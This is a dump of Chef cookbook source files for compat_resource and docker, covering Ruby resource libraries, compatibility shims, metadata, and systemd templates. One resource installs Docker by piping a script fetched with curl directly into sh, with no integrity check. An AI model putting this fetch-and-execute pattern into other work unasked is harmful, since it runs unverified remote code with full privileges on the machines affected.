4 | 5 | ## 12.16.2 (2016-11-09) 6 | 7 | - Sync chef-client changes from Chef 12.16.42 8 | 9 | ## 12.16.1 (2016-10-20) 10 | 11 | - add delayed_action helper 12 | 13 | ## 12.16.0 (2016-10-19) 14 | 15 | - Sync chef-client changes from Chef 12.16.14 16 | 17 | ## 12.14.7 (2016-09-26) 18 | 19 | - Update to 12.14.89 Chef 20 | - Fix autoload by applying fix from #106 21 | 22 | ## 12.14.6 (2016-09-20) 23 | 24 | - Update backported codebase to Chef 12.14.77 which brings in yum_repository updates and why-run enabled by default in custom resources 25 | 26 | ## 12.14.5 (2016-09-19) 27 | 28 | - Prevent spamming messages in Chefspec runs for cookbooks that depend on compat_resource 29 | 30 | ## 12.14.4 (2016-09-19) 31 | 32 | - Fix delayed notifications cloning 33 | 34 | ## 12.14.3 (2016-09-12) 35 | 36 | - Fix subscribes notifications 37 | 38 | ## 12.14.2 (2016-09-09) 39 | 40 | - Improve documentation 41 | - keep ChefCompat::Resource defined even if we don't load 42 | 43 | ## 12.14.1 (2016-09-07) 44 | 45 | - add yum_repository resource from Chef 12.14 46 | - Update the minimum chef version in the metadata to 12.1 47 | - Added maintainers files 48 | - suppress constant redef warnings when running chefspec 49 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Please refer to 2 | https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD 3 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/MAINTAINERS.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # Maintainers 4 | 5 | This file lists how this cookbook project is maintained. 
When making changes to the system, this file tells you who needs to review your patch - you need a review from an existing maintainer for the cookbook to provide a :+1: on your pull request. Additionally, you need to not receive a veto from a Lieutenant or the Project Lead. 6 | 7 | Check out [How Cookbooks are Maintained](https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD) for details on the process and how to become a maintainer or the project lead. 8 | 9 | # Project Maintainer 10 | * [Lamont Granquist](https://github.com/lamont-granquist) 11 | 12 | # Maintainers 13 | * [Jennifer Davis](https://github.com/sigje) 14 | * [Tim Smith](https://github.com/tas50) 15 | * [Thom May](https://github.com/thommay) 16 | * [Lamont Granquist](https://github.com/lamont-granquist) 17 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef.rb: -------------------------------------------------------------------------------- 1 | module ChefCompat 2 | module CopiedFromChef 3 | def self.extend_chef_module(chef_module, target) 4 | target.instance_eval do 5 | include chef_module 6 | @chef_module = chef_module 7 | def self.method_missing(name, *args, &block) 8 | @chef_module.send(name, *args, &block) 9 | end 10 | def self.const_missing(name) 11 | @chef_module.const_get(name) 12 | end 13 | end 14 | end 15 | 16 | # This patch to CopiedFromChef's ActionClass is necessary for the include to work 17 | require 'chef/resource' 18 | class Chef < ::Chef 19 | class Resource < ::Chef::Resource 20 | module ActionClass 21 | def self.use_inline_resources 22 | end 23 | def self.include_resource_dsl(include_resource_dsl) 24 | end 25 | end 26 | end 27 | end 28 | end 29 | end 30 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef/chef/constants.rb: 
-------------------------------------------------------------------------------- 1 | # 2 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 3 | # 4 | # THIS IS A FILE AUTOGENERATED BY 'rake update' DO NOT EDIT!!!! 5 | # 6 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 7 | # 8 | 9 | begin 10 | require 'chef/constants' 11 | rescue LoadError; end 12 | 13 | require 'chef_compat/copied_from_chef' 14 | class Chef 15 | module ::ChefCompat 16 | module CopiedFromChef 17 | # 18 | # Author:: John Keiser 19 | # Copyright:: Copyright 2015-2016, Chef Software Inc. 20 | # License:: Apache License, Version 2.0 21 | # 22 | # Licensed under the Apache License, Version 2.0 (the "License"); 23 | # you may not use this file except in compliance with the License. 24 | # You may obtain a copy of the License at 25 | # 26 | # http://www.apache.org/licenses/LICENSE-2.0 27 | # 28 | # Unless required by applicable law or agreed to in writing, software 29 | # distributed under the License is distributed on an "AS IS" BASIS, 30 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 31 | # See the License for the specific language governing permissions and 32 | # limitations under the License. 33 | 34 | class Chef < (defined?(::Chef) ? ::Chef : Object) 35 | NOT_PASSED = Object.new 36 | def NOT_PASSED.to_s 37 | "NOT_PASSED" 38 | end 39 | 40 | def NOT_PASSED.inspect 41 | to_s 42 | end 43 | NOT_PASSED.freeze 44 | end 45 | end 46 | end 47 | end 48 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef/chef/delayed_evaluator.rb: -------------------------------------------------------------------------------- 1 | # 2 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 3 | # 4 | # THIS IS A FILE AUTOGENERATED BY 'rake update' DO NOT EDIT!!!! 
5 | # 6 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 7 | # 8 | 9 | begin 10 | require 'chef/delayed_evaluator' 11 | rescue LoadError; end 12 | 13 | require 'chef_compat/copied_from_chef' 14 | class Chef 15 | module ::ChefCompat 16 | module CopiedFromChef 17 | # 18 | # Author:: John Keiser 19 | # Copyright:: Copyright 2015-2016, Chef Software Inc. 20 | # License:: Apache License, Version 2.0 21 | # 22 | # Licensed under the Apache License, Version 2.0 (the "License"); 23 | # you may not use this file except in compliance with the License. 24 | # You may obtain a copy of the License at 25 | # 26 | # http://www.apache.org/licenses/LICENSE-2.0 27 | # 28 | # Unless required by applicable law or agreed to in writing, software 29 | # distributed under the License is distributed on an "AS IS" BASIS, 30 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 31 | # See the License for the specific language governing permissions and 32 | # limitations under the License. 33 | 34 | class Chef < (defined?(::Chef) ? ::Chef : Object) 35 | class DelayedEvaluator < (defined?(::Chef::DelayedEvaluator) ? ::Chef::DelayedEvaluator : Proc) 36 | end 37 | end 38 | end 39 | end 40 | end 41 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef/chef/dsl/recipe.rb: -------------------------------------------------------------------------------- 1 | # 2 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 3 | # 4 | # THIS IS A FILE AUTOGENERATED BY 'rake update' DO NOT EDIT!!!! 
5 | # 6 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 7 | # 8 | 9 | begin 10 | require 'chef/dsl/recipe' 11 | rescue LoadError; end 12 | 13 | require 'chef_compat/copied_from_chef' 14 | class Chef 15 | module ::ChefCompat 16 | module CopiedFromChef 17 | require "chef_compat/copied_from_chef/chef/dsl/core" 18 | require "chef_compat/copied_from_chef/chef/mixin/lazy_module_include" 19 | class Chef < (defined?(::Chef) ? ::Chef : Object) 20 | module DSL 21 | CopiedFromChef.extend_chef_module(::Chef::DSL, self) if defined?(::Chef::DSL) 22 | module Recipe 23 | CopiedFromChef.extend_chef_module(::Chef::DSL::Recipe, self) if defined?(::Chef::DSL::Recipe) 24 | include Chef::DSL::Core 25 | extend Chef::Mixin::LazyModuleInclude 26 | module FullDSL 27 | CopiedFromChef.extend_chef_module(::Chef::DSL::Recipe::FullDSL, self) if defined?(::Chef::DSL::Recipe::FullDSL) 28 | include Chef::DSL::Recipe 29 | extend Chef::Mixin::LazyModuleInclude 30 | end 31 | end 32 | end 33 | end 34 | require "chef_compat/copied_from_chef/chef/resource" 35 | end 36 | end 37 | end 38 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef/chef/resource/apt_update.rb: -------------------------------------------------------------------------------- 1 | # 2 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 3 | # 4 | # THIS IS A FILE AUTOGENERATED BY 'rake update' DO NOT EDIT!!!! 5 | # 6 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 7 | # 8 | 9 | begin 10 | require 'chef/resource/apt_update' 11 | rescue LoadError; end 12 | 13 | require 'chef_compat/copied_from_chef' 14 | class Chef 15 | module ::ChefCompat 16 | module CopiedFromChef 17 | # 18 | # Author:: Thom May () 19 | # Copyright:: Copyright (c) 2016 Chef Software, Inc. 
20 | # License:: Apache License, Version 2.0 21 | # 22 | # Licensed under the Apache License, Version 2.0 (the "License"); 23 | # you may not use this file except in compliance with the License. 24 | # You may obtain a copy of the License at 25 | # 26 | # http://www.apache.org/licenses/LICENSE-2.0 27 | # 28 | # Unless required by applicable law or agreed to in writing, software 29 | # distributed under the License is distributed on an "AS IS" BASIS, 30 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 31 | # See the License for the specific language governing permissions and 32 | # limitations under the License. 33 | # 34 | 35 | require "chef_compat/copied_from_chef/chef/resource" 36 | 37 | class Chef < (defined?(::Chef) ? ::Chef : Object) 38 | class Resource < (defined?(::Chef::Resource) ? ::Chef::Resource : Object) 39 | class AptUpdate < (defined?(::Chef::Resource::AptUpdate) ? ::Chef::Resource::AptUpdate : Chef::Resource) 40 | resource_name :apt_update 41 | provides :apt_update, os: "linux" 42 | 43 | property :frequency, Integer, default: 86_400 44 | 45 | default_action :periodic 46 | allowed_actions :update, :periodic 47 | end 48 | end 49 | end 50 | end 51 | end 52 | end 53 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/mixin/properties.rb: -------------------------------------------------------------------------------- 1 | require 'chef_compat/monkeypatches' 2 | require 'chef_compat/copied_from_chef/chef/mixin/properties' 3 | 4 | module ChefCompat 5 | module Mixin 6 | Properties = ChefCompat::CopiedFromChef::Chef::Mixin::Properties 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/monkeypatches/chef.rb: -------------------------------------------------------------------------------- 1 | class Chef 2 | NOT_PASSED = Object.new if 
!defined?(NOT_PASSED) 3 | # Earlier versions of Chef didn't have this message 4 | module ChefCompatDeprecation 5 | def log_deprecation(message, location=nil) 6 | if !location 7 | # Pick the first caller that is *not* part of the Chef or ChefCompat gem, 8 | # that's the thing the user wrote. 9 | chef_compat_gem_path = File.expand_path("../../..", __FILE__) 10 | chef_gem_path = File.expand_path("../..",::Chef::Resource.instance_method(:initialize).source_location[0]) 11 | caller(0..10).each do |c| 12 | if !c.start_with?(chef_gem_path) && !c.start_with?(chef_compat_gem_path) 13 | location = c 14 | break 15 | end 16 | end 17 | end 18 | 19 | begin 20 | super 21 | # Bleagh. `super_method` doesn't exist on older rubies and I haven't 22 | # figured out a way to check for its existence otherwise. 23 | rescue NoMethodError 24 | Chef::Log.warn(message) 25 | end 26 | end 27 | end 28 | 29 | class<= 12.5 && Chef::VERSION.to_f <= 12.8 2 | require 'chef/mixin/params_validate' 3 | class Chef 4 | module Mixin 5 | module ParamsValidate 6 | class SetOrReturnProperty < Chef::Property 7 | # 12.9 introduced a new optional parameter to `get()` to avoid a nil-set warning. 8 | # When their method gets called with 2 args, we need to ignore and call with 1. 
9 | alias_method :_original_get2, :get 10 | def get(resource, *args) 11 | _original_get2(resource) 12 | end 13 | end 14 | end 15 | end 16 | end 17 | end 18 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/monkeypatches/chef/node.rb: -------------------------------------------------------------------------------- 1 | class Chef 2 | class Node 3 | unless method_defined?(:set_cookbook_attribute) 4 | def set_cookbook_attribute 5 | # this implementation deliberately left blank - we don't need to do anything we just need to not fail 6 | end 7 | end 8 | end 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/monkeypatches/chef/property.rb: -------------------------------------------------------------------------------- 1 | # 12.9 introduced a new optional parameter to `get()` to avoid a nil-set warning. 2 | # We need to mimick it here. 3 | if Chef::VERSION.to_f >= 12.5 && Chef::VERSION.to_f <= 12.8 4 | require 'chef/property' 5 | class Chef 6 | class Property 7 | # 12.9 introduced a new optional parameter to `get()` to avoid a nil-set warning. 8 | # When their method gets called with 2 args, we need to ignore and call with 1. 9 | alias_method :_original_get, :get 10 | def get(resource, *args) 11 | _original_get(resource) 12 | end 13 | end 14 | end 15 | end 16 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/monkeypatches/chef/recipe_hook.rb: -------------------------------------------------------------------------------- 1 | require 'chef/recipe' 2 | require 'chef_compat/recipe' 3 | 4 | class Chef::Recipe 5 | # If the cookbook depends on compat_resource, create a ChefCompat::Recipe object 6 | # instead of Chef::Recipe, for the extra goodies. 
7 | def self.new(cookbook_name, recipe_name, run_context) 8 | if run_context && 9 | cookbook_name && 10 | recipe_name && 11 | run_context.cookbook_collection && 12 | run_context.cookbook_collection[cookbook_name] && 13 | run_context.cookbook_collection[cookbook_name].metadata.dependencies.has_key?('compat_resource') && 14 | self != ::ChefCompat::Recipe 15 | ::ChefCompat::Recipe.new(cookbook_name, recipe_name, run_context) 16 | else 17 | super 18 | end 19 | end 20 | end 21 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/property.rb: -------------------------------------------------------------------------------- 1 | require 'chef_compat/copied_from_chef/chef/property' 2 | 3 | module ChefCompat 4 | class Property < ChefCompat::CopiedFromChef::Chef::Property 5 | end 6 | end 7 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/recipe.rb: -------------------------------------------------------------------------------- 1 | require 'chef/recipe' 2 | require 'chef_compat/copied_from_chef/chef/dsl/recipe' 3 | 4 | module ChefCompat 5 | class Recipe < Chef::Recipe 6 | include ChefCompat::CopiedFromChef::Chef::DSL::Recipe::FullDSL 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/resource/lwrp_base.rb: -------------------------------------------------------------------------------- 1 | require 'chef_compat/resource' 2 | require 'chef_compat/copied_from_chef/chef/resource' 3 | require 'chef/mixin/convert_to_class_name' 4 | require 'chef/mixin/from_file' 5 | 6 | module ChefCompat 7 | class Resource < ChefCompat::CopiedFromChef::Chef::Resource 8 | class LWRPBase < ChefCompat::Resource 9 | class<= 12.0").satisfied_by?(Gem::Version.new(Chef::VERSION)) 4 | 5 | require 'chef_compat/resource' 6 | require 
'chef_compat/property' 7 | require 'chef_compat/mixin/properties' 8 | 9 | resources_dir = File.expand_path("chef_compat/copied_from_chef/chef/resource", File.dirname(__FILE__)) 10 | providers_dir = File.expand_path("chef_compat/copied_from_chef/chef/provider", File.dirname(__FILE__)) 11 | Dir["#{resources_dir}/*.rb"].each {|file| require file } 12 | Dir["#{providers_dir}/*.rb"].each {|file| require file } 13 | else 14 | 15 | class Chef 16 | class Resource 17 | def self.property(args, &block) 18 | raise_chef_11_error 19 | end 20 | 21 | def self.resource_name(args, &block) 22 | raise_chef_11_error 23 | end 24 | 25 | def self.action(args, &block) 26 | raise_chef_11_error 27 | end 28 | 29 | def self.raise_chef_11_error 30 | raise "This resource is written with Chef 12.5 custom resources, and requires at least Chef 12.0 used with the compat_resource cookbook, it will not work with Chef 11.x clients, and those users must pin their cookbooks to older versions or upgrade." 31 | end 32 | end 33 | end 34 | 35 | end 36 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Please refer to 2 | https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD 3 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_exec.rb: -------------------------------------------------------------------------------- 1 | module DockerCookbook 2 | class DockerExec < DockerBase 3 | resource_name :docker_exec 4 | 5 | property :host, [String, nil], default: lazy { ENV['DOCKER_HOST'] }, desired_state: false 6 | property :command, Array 7 | property :container, String 8 | property :timeout, Numeric, default: 60, desired_state: false 9 | property :container_obj, Docker::Container, desired_state: false 10 | 11 | alias_method :cmd, :command 12 | 13 | 
action :run do 14 | converge_by "executing #{new_resource.command} on #{new_resource.container}" do 15 | with_retries { new_resource.container_obj Docker::Container.get(new_resource.container, {}, connection) } 16 | new_resource.container_obj.exec(new_resource.command, wait: new_resource.timeout) 17 | end 18 | end 19 | end 20 | end 21 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_image_prune.rb: -------------------------------------------------------------------------------- 1 | module DockerCookbook 2 | class DockerImagePrune < DockerBase 3 | resource_name :docker_image_prune 4 | # Requires docker API v1.25 5 | # Modify the default of read_timeout from 60 to 120 6 | property :read_timeout, default: 120, desired_state: false 7 | property :host, [String, nil], default: lazy { ENV['DOCKER_HOST'] }, desired_state: false 8 | 9 | # https://docs.docker.com/engine/api/v1.35/#operation/ImagePrune 10 | property :dangling, [TrueClass, FalseClass], default: true 11 | property :prune_until, String 12 | # https://docs.docker.com/engine/reference/builder/#label 13 | property :with_label, String 14 | property :without_label, String 15 | 16 | ######### 17 | # Actions 18 | ######### 19 | 20 | default_action :prune 21 | 22 | action :prune do 23 | # Have to call this method ourselves due to 24 | # https://github.com/swipely/docker-api/pull/507 25 | json = generate_json(new_resource) 26 | # Post 27 | res = connection.post('/images/prune', json) 28 | Chef::Log.info res 29 | end 30 | 31 | def generate_json(new_resource) 32 | opts = { filters: ["dangling=#{new_resource.dangling}"] } 33 | opts[:filters].push("until=#{new_resource.prune_until}") if new_resource.property_is_set?(:prune_until) 34 | opts[:filters].push("label=#{new_resource.with_label}") if new_resource.property_is_set?(:with_label) 35 | opts[:filters].push("label!=#{new_resource.without_label}") if new_resource.property_is_set?(:without_label) 36 | 
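opts.to_json 37 | end 38 | end 39 | end 40 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_installation_script.rb: --------------------------------------------------------------------------------
require 'shellwords'

module DockerCookbook
  # Installs Docker by fetching an install script with curl and piping it
  # into sh; the :delete action removes the docker-ce / docker-engine packages.
  class DockerInstallationScript < DockerBase
    resource_name :docker_installation_script

    provides :docker_installation, os: 'linux'

    # Release channel; selects the default script URL below.
    property :repo, %w(main test experimental), default: 'main', desired_state: false
    # URL the install script is fetched from; defaults to the URL for `repo`.
    property :script_url, String, default: lazy { default_script_url }, desired_state: false

    default_action :create

    #########################
    # property helper methods
    #########################

    # Maps the repo property to its install-script URL.
    # Returns nil when repo matches none of the branches.
    def default_script_url
      case repo
      when 'main'
        'https://get.docker.com/'
      when 'test'
        'https://test.docker.com/'
      when 'experimental'
        'https://experimental.docker.com/'
      end
    end

    #########
    # Actions
    #########

    action :create do
      package 'curl'

      execute 'install docker' do
        # The URL is a user-settable property that ends up inside a shell
        # command line, so it is shell-escaped to keep characters such as
        # `&`, `;` or spaces from being interpreted by the shell.
        # NOTE(review): the downloaded script is executed with the privileges
        # of the Chef run and without any checksum or signature check; the
        # only protection is the transport (HTTPS for the default URLs).
        # Prefer a package-based installation where integrity matters, and
        # restrict script_url to sources you control.
        command "curl -sSL #{Shellwords.escape(new_resource.script_url)} | sh"
        # Skip the download entirely once the docker binary is present.
        creates '/usr/bin/docker'
      end
    end

    action :delete do
      package %w(docker-ce docker-engine) do
        action :remove
      end
    end
  end
end
-------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_registry.rb: --------------------------------------------------------------------------------
module DockerCookbook
  # Logs in to a Docker registry and caches the credentials in
  # node.run_state['docker_auth'], keyed by registry host.
  class DockerRegistry < DockerBase
    resource_name :docker_registry

    property :email, String

    # Marked sensitive so the value is kept out of resource output.
    property :password, String,
             sensitive: true

    property :serveraddress, String,
             name_property: true

    property :username, String

    property :host, [String, nil], default: lazy { ENV['DOCKER_HOST'] }, desired_state: false

    action :login do
      # api_retries and parse_registry_host are not defined in this file;
      # presumably they come from DockerBase.
      tries = new_resource.api_retries

      registry_host = parse_registry_host(new_resource.serveraddress)

      # The plaintext password is held in run_state for the rest of the run.
      # NOTE(review): make sure nothing dumps node.run_state to logs or
      # reports, since `sensitive: true` only covers the property itself.
      (node.run_state['docker_auth'] ||= {})[registry_host] = {
        'serveraddress' => registry_host,
        'username' => new_resource.username,
        'password' => new_resource.password,
        'email' => new_resource.email,
      }

      begin
        # NOTE(review): this posts through the global Docker.connection, so
        # the `host` property declared above is not used here - confirm that
        # is intended.
        Docker.connection.post(
          '/auth', {},
          body: node.run_state['docker_auth'][registry_host].to_json
        )
      rescue Docker::Error::ServerError, Docker::Error::UnauthorizedError
        # `<= 0` rather than `== 0`: with api_retries of 0 (or a negative
        # value) the counter would step past zero and the login would be
        # retried forever against a registry that keeps rejecting it.
        raise Docker::Error::AuthenticationError, "#{new_resource.username} failed to authenticate with #{new_resource.serveraddress}" if (tries -= 1) <= 0
        retry
      end

      true
    end
  end
end
-------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_tag.rb: --------------------------------------------------------------------------------
module DockerCookbook
  # Tags an existing image (target_repo:target_tag) as to_repo:to_tag.
  class DockerTag < DockerBase
    resource_name :docker_tag

    property :target_repo, String, name_property: true
    property :target_tag, String
    property :to_repo, String
    property :to_tag, String
    property :force, [TrueClass, FalseClass], default: false, desired_state: false

    #########
    # Actions
    #########

    action :tag do
      # Without force, an already existing destination tag is left untouched.
      return if new_resource.force == false && Docker::Image.exist?("#{new_resource.to_repo}:#{new_resource.to_tag}")
      begin
        converge_by "update #{new_resource.target_repo}:#{new_resource.target_tag} to #{new_resource.to_repo}:#{new_resource.to_tag}" do
          i = Docker::Image.get("#{new_resource.target_repo}:#{new_resource.target_tag}")
          i.tag('repo' => new_resource.to_repo, 'tag' => new_resource.to_tag, 'force' => new_resource.force)
        end
      rescue Docker::Error => e
        # Re-raised with only the message text, so the original exception
        # class is not preserved for callers.
        raise e.message
      end
    end
  end
end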
-------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_volume.rb: -------------------------------------------------------------------------------- 1 | module DockerCookbook 2 | class DockerVolume < DockerBase 3 | resource_name :docker_volume 4 | 5 | property :driver, String, desired_state: false 6 | property :host, [String, nil], default: lazy { ENV['DOCKER_HOST'] }, desired_state: false 7 | property :opts, Hash, desired_state: false 8 | property :volume, Docker::Volume, desired_state: false 9 | property :volume_name, String, name_property: true 10 | 11 | load_current_value do 12 | begin 13 | with_retries { volume Docker::Volume.get(volume_name, connection) } 14 | rescue Docker::Error::NotFoundError 15 | current_value_does_not_exist! 16 | end 17 | end 18 | 19 | action :create do 20 | converge_by "creating volume #{new_resource.volume_name}" do 21 | opts = {} 22 | opts['Driver'] = new_resource.driver if property_is_set?(:driver) 23 | opts['DriverOpts'] = new_resource.opts if property_is_set?(:opts) 24 | Docker::Volume.create(new_resource.volume_name, opts, connection) 25 | end if current_resource.nil? 26 | end 27 | 28 | action :remove do 29 | converge_by "removing volume #{new_resource.volume_name}" do 30 | current_resource.volume.remove 31 | end unless current_resource.nil? 
32 | end 33 | end 34 | end 35 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/metadata.json: -------------------------------------------------------------------------------- 1 | {"name":"docker","version":"4.9.3","description":"Provides docker_service, docker_image, and docker_container resources","long_description":"","maintainer":"Chef Software, Inc.","maintainer_email":"cookbooks@chef.io","license":"Apache-2.0","platforms":{"amazon":">= 0.0.0","centos":">= 0.0.0","scientific":">= 0.0.0","oracle":">= 0.0.0","debian":">= 0.0.0","fedora":">= 0.0.0","redhat":">= 0.0.0","ubuntu":">= 0.0.0"},"dependencies":{},"recommendations":{},"suggestions":{},"conflicting":{},"providing":{},"replacing":{},"attributes":{},"groupings":{},"recipes":{},"source_url":"https://github.com/chef-cookbooks/docker","issues_url":"https://github.com/chef-cookbooks/docker/issues","gems":[["docker-api","~> 1.34.0"]],"chef_version":[[">= 12.15"]],"ohai_version":[]} -------------------------------------------------------------------------------- /chef/cookbooks/docker/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'docker' 2 | maintainer 'Chef Software, Inc.' 
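3 | maintainer_email 'cookbooks@chef.io' 4 | license 'Apache-2.0' 5 | description 'Provides docker_service, docker_image, and docker_container resources' 6 | version '4.9.3' 7 | 8 | source_url 'https://github.com/chef-cookbooks/docker' 9 | issues_url 'https://github.com/chef-cookbooks/docker/issues' 10 | 11 | supports 'amazon' 12 | supports 'centos' 13 | supports 'scientific' 14 | supports 'oracle' 15 | supports 'debian' 16 | supports 'fedora' 17 | supports 'redhat' 18 | supports 'ubuntu' 19 | 20 | chef_version '>= 12.15' 21 | gem 'docker-api', '~> 1.34.0' 22 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/default/docker-wait-ready.erb: --------------------------------------------------------------------------------
#!/usr/bin/env bash
# Wait until the Docker daemon answers `ps`.
#
# Polls every 0.5 seconds, for at most twice @service_timeout attempts.
# Exits 0 as soon as the first line of the `ps` output starts with CONTAINER,
# and exits 1 when every attempt has been used up.
#
# The script fails closed: success is reported only from the branch that saw
# the daemon respond. If the rendered attempt limit is not an integer, the
# loop test errors out and the script falls through to `exit 1` rather than
# reporting a daemon that was never checked as ready.
max_attempts=<%= @service_timeout * 2 %>
attempt=0
while [ "$attempt" -lt "$max_attempts" ]; do
  if <%= @docker_cmd %> ps | head -n 1 | grep -q '^CONTAINER' > /dev/null 2>&1; then
    exit 0
  fi
  attempt=$((attempt + 1))
  sleep 0.5
done
exit 1
-------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/default/docker.erb: -------------------------------------------------------------------------------- 1 | # Docker Upstart and SysVinit configuration file 2 | 3 | # If you need Docker to use an HTTP proxy, it can also be specified here. 4 | <% if @config.http_proxy %> 5 | export http_proxy="<%= @config.http_proxy %>" 6 | <% end %> 7 | <% if @config.https_proxy %> 8 | export https_proxy="<%= @config.https_proxy %>" 9 | <% end %> 10 | 11 | <% if @config.no_proxy %> 12 | export no_proxy="<%= @config.no_proxy %>" 13 | <% end %> 14 | 15 | # This is also a handy place to tweak where Docker's temporary files go. 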
16 | <% if @config.tmpdir %> 17 | export TMPDIR="<%= @config.tmpdir %>" 18 | <% end %> 19 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/sysconfig/docker.erb: -------------------------------------------------------------------------------- 1 | # /etc/sysconfig/docker 2 | 3 | # If you need Docker to use an HTTP proxy, it can also be specified here. 4 | <% if @config.http_proxy %> 5 | export http_proxy="<%= @config.http_proxy %>" 6 | <% end %> 7 | <% if @config.https_proxy %> 8 | export https_proxy="<%= @config.https_proxy %>" 9 | <% end %> 10 | 11 | <% if @config.no_proxy %> 12 | export no_proxy="<%= @config.no_proxy %>" 13 | <% end %> 14 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/docker.service-override.erb: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=Docker Application Container Engine 3 | Documentation=https://docs.docker.com 4 | <% if @docker_socket.nil? %> 5 | After=network-online.target firewalld.service 6 | <% else %> 7 | After=network-online.target <%= @docker_name %>.socket firewalld.service 8 | Requires=<%= @docker_name %>.socket 9 | <% end %> 10 | Wants=network-online.target 11 | 12 | [Service] 13 | Type=notify 14 | <% if @config.http_proxy %> 15 | Environment="HTTP_PROXY=<%= @config.http_proxy %>" 16 | <% end %> 17 | <% if @config.https_proxy %> 18 | Environment="HTTPS_PROXY=<%= @config.https_proxy %>" 19 | <% end %> 20 | <% if @config.no_proxy %> 21 | Environment="NO_PROXY=<%= @config.no_proxy %>" 22 | <% end %> 23 | <% if @config.tmpdir %> 24 | Environment="TMPDIR=<%= @config.tmpdir %>" 25 | <% end %> 26 | <% @env_vars.each do |key, val| %> 27 | Environment="<%= key %>=<%= val %>" 28 | <% end unless @env_vars.nil? 
%> 29 | <% if @config.ipv4_forward %> 30 | ExecStartPre=/sbin/sysctl -w net.ipv4.ip_forward=1 31 | <% end %> 32 | <% if @config.ipv6_forward %> 33 | ExecStartPre=/sbin/sysctl -w net.ipv6.conf.all.forwarding=1 34 | <% end %> 35 | ExecStart=<%= @docker_daemon_cmd %> 36 | ExecStartPost=<%= @docker_wait_ready %> 37 | ExecReload=/bin/kill -s HUP $MAINPID 38 | <% if @config.mount_flags %> 39 | MountFlags=<%= @config.mount_flags %> 40 | <% end %> 41 | LimitNOFILE=1048576 42 | LimitNPROC=infinity 43 | LimitCORE=infinity 44 | TasksMax=infinity 45 | TimeoutStartSec=0 46 | Delegate=yes 47 | KillMode=process 48 | Restart=always 49 | StartLimitBurst=3 50 | StartLimitInterval=60s 51 | <%= @systemd_args %> 52 | 53 | [Install] 54 | WantedBy=multi-user.target 55 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/docker.service.erb: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=Docker Application Container Engine 3 | Documentation=https://docs.docker.com 4 | <% if @docker_socket.nil? %> 5 | After=network-online.target firewalld.service 6 | <% else %> 7 | After=network-online.target <%= @docker_name %>.socket firewalld.service 8 | Requires=<%= @docker_name %>.socket 9 | <% end %> 10 | Wants=network-online.target 11 | 12 | [Service] 13 | Type=notify 14 | # the default is not to use systemd for cgroups because the delegate issues still 15 | # exists and systemd currently does not support the cgroup feature set required 16 | # for containers run by docker 17 | ExecStart=/usr/bin/dockerd -H fd:// 18 | ExecReload=/bin/kill -s HUP $MAINPID 19 | LimitNOFILE=1048576 20 | # Having non-zero Limit*s causes performance problems due to accounting overhead 21 | # in the kernel. We recommend using cgroups to do container-local accounting. 22 | LimitNPROC=infinity 23 | LimitCORE=infinity 24 | # Uncomment TasksMax if your systemd version supports it. 
